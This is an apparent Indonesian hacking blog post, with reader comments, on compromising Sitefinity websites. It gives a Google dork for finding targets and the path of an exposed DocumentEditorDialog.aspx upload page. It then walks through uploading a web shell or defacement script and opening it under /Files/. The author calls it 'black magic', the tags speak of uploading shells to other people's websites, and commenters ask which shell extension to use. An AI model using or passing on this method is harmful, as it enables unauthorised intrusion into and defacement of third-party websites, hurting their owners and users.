/Sitefinity/login.aspx
inurl: "UserControls/Dialogs"
[+] Exploit :
www.target.mu/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
[+] Access Shell :
www.target.mu/Files/x.aspx
cari target di google dengan dork di atas
terus tambahkan exploitnya
ganti login.aspx
dengan sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
maka akan muncul tempat upload kayak gini
browser tempat mu simpan shell or script depes :v
dan upload
kalau berhasil kayak gini
akses shell
www.target.mu/Files/namashell.php
tara selesai
Thanks sobat telah berkunjung di blog tim nyubi ini ;)
Semoga ilmu hitam ini bermanfaat :)
tag : cara upload shell di web orang lain , cara deface mudah dengan upload shell di web target
terima kasih mastah ,,,dah membabtu
ReplyDeleteterima kasih mastah ,,,dah membabtu
ReplyDeletethx mastah udah membantu
ReplyDeletesama sama um
ReplyDeleteStah shell nya ber extensi apa.?
ReplyDeleteStah upload shellnya ber-extensi apa.?
DeletePhp um
Delete